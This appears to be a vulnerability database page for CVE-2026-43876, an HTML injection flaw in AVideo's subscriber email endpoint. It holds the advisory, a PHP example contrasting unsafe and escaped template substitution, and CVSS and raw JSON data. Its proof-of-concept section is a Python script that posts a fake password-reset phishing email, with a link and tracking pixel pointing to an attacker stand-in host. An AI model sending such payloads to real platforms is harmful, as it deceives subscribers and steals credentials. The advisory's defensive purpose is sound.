Security Vulnerability Report
CVE-2026-43876 CVSS 6.4 MEDIUM

CVE-2026-43876

Published: 2026-05-11 22:22:12
Last Modified: 2026-05-11 22:22:12

Description

WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/notifySubscribers.json.php takes the raw message POST parameter and passes it into sendSiteEmail(), which substitutes it directly into an HTML email template (via str_replace on the {message} placeholder) and renders it with PHPMailer::msgHTML(). There is no HTML sanitization, character escaping, or output encoding on the attacker-controlled message between $_POST['message'] and the rendered email. Any authenticated user with upload permission can therefore broadcast arbitrary HTML — phishing links, tracking pixels, CSS/UI spoofing — to every subscriber on their channel (up to 10,000 recipients per invocation). The email is sent From: the platform's configured contact address and wrapped in the site's official logo and title, so attacker-supplied HTML arrives with the appearance of an official platform communication. Commit https://github.com/WWBN/AVideo/commit/ contains an updated fix.
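The pattern the description names (raw POST input spliced into an HTML template with str_replace and handed to msgHTML()) is easiest to see next to a hardened version. The PHP below is an added illustration written for this page; it is not AVideo's code and does not reproduce what the fix commit changed. The template constant, the function names and the sample input are constructed stand-ins, not the project's identifiers.

```php
<?php
// Added example, not AVideo's code. Names here are assumptions.

// Constructed stand-in for an HTML email template with a {message} placeholder.
const EMAIL_TEMPLATE = '<html><body><h1>{siteTitle}</h1><div>{message}</div></body></html>';

// Vulnerable pattern described in the advisory: the untrusted string is
// substituted as-is, so any markup it contains becomes part of the email.
function buildEmailBodyUnsafe(string $siteTitle, string $message): string
{
    return str_replace(['{siteTitle}', '{message}'], [$siteTitle, $message], EMAIL_TEMPLATE);
}

// Hardened pattern: treat the subscriber notification as plain text. Every
// HTML metacharacter is entity-encoded before substitution, so the only
// markup in the result is the template's own. Line breaks are preserved
// with nl2br() after escaping, so they cannot be used to inject markup.
function buildEmailBodySafe(string $siteTitle, string $message): string
{
    $escape = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    $safeMessage = nl2br($escape($message), false);
    return str_replace(['{siteTitle}', '{message}'], [$escape($siteTitle), $safeMessage], EMAIL_TEMPLATE);
}

// Regression guard usable in a unit test: a correctly escaped body must not
// contain any element that the template itself does not contain. The <br>
// tags produced by nl2br() are the one sanctioned addition and are ignored.
function bodyContainsForeignTags(string $body): bool
{
    $pattern = '/<(?!br\b)[a-z][^>]*>/i';
    $templateTagCount = preg_match_all($pattern, EMAIL_TEMPLATE);
    $bodyTagCount = preg_match_all($pattern, $body);
    return $bodyTagCount > $templateTagCount;
}

// Constructed sample input of the kind the description mentions:
// a link plus a one-pixel image, both pointing at a reserved example domain.
$untrusted = "Please review your account.\n"
    . '<a href="https://example.invalid/reset">Click here</a>'
    . '<img src="https://example.invalid/p.png" width="1" height="1">';

$unsafe = buildEmailBodyUnsafe('MySite', $untrusted);
$safe = buildEmailBodySafe('MySite', $untrusted);

echo "unsafe body carries injected markup: " . var_export(bodyContainsForeignTags($unsafe), true) . PHP_EOL;
echo "escaped body carries injected markup: " . var_export(bodyContainsForeignTags($safe), true) . PHP_EOL;
echo $safe . PHP_EOL;
```

If the notification feature is meant to allow some formatting, entity-encoding everything is too strict; the alternative is an allowlist HTML sanitizer applied before substitution, which still leaves the tags, attributes and URL schemes under the platform's control rather than the sender's. Either way the check above (no elements beyond what the template and sanitizer permit) belongs in the test suite for the email path.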

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WWBN AVideo <= 29.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Configuration
target_url = "http://target-site/objects/notifySubscribers.json.php"

# Attacker's session cookie (User must be authenticated with upload permissions)
cookies = {
    "PHPSESSID": "valid_session_id_here"
}

# Malicious HTML Payload
# This payload includes a phishing link and a tracking pixel
html_payload = """
<div style="background-color:#f0f0f0;padding:20px;border:1px solid #ccc;">
    <h2>Security Alert: Password Reset Required</h2>
    <p>Dear User,</p>
    <p>We detected suspicious activity. Please update your password immediately.</p>
    <a href="http://attacker-controlled-site.com/phishing" style="color:red;font-weight:bold;">Click here to Reset</a>
    <br><br>
    <!-- Tracking pixel to verify email delivery/opening -->
    <img src="http://attacker-controlled-site.com/track.png" width="1" height="1" alt="">
</div>
"""

# POST data to the vulnerable endpoint
payload_data = {
    "message": html_payload,
    "subject": "Urgent: System Security Update",
    # other required parameters by the endpoint
}

try:
    response = requests.post(target_url, cookies=cookies, data=payload_data)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Subscribers should have received the malicious email.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43876", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:11.983", "lastModified": "2026-05-11T22:22:11.983", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/notifySubscribers.json.php takes the raw message POST parameter and passes it into sendSiteEmail(), which substitutes it directly into an HTML email template (via str_replace on the {message} placeholder) and renders it with PHPMailer::msgHTML(). There is no HTML sanitization, character escaping, or output encoding on the attacker-controlled message between $_POST['message'] and the rendered email. Any authenticated user with upload permission can therefore broadcast arbitrary HTML — phishing links, tracking pixels, CSS/UI spoofing — to every subscriber on their channel (up to 10,000 recipients per invocation). The email is sent From: the platform's configured contact address and wrapped in the site's official logo and title, so attacker-supplied HTML arrives with the appearance of an official platform communication. Commit https://github.com/WWBN/AVideo/commit/ contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/078c4342eb9969a70425a9cdca3eefa7f8a86d53", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-g9cm-rxp7-6gv5", "source": "[email protected]"}]}}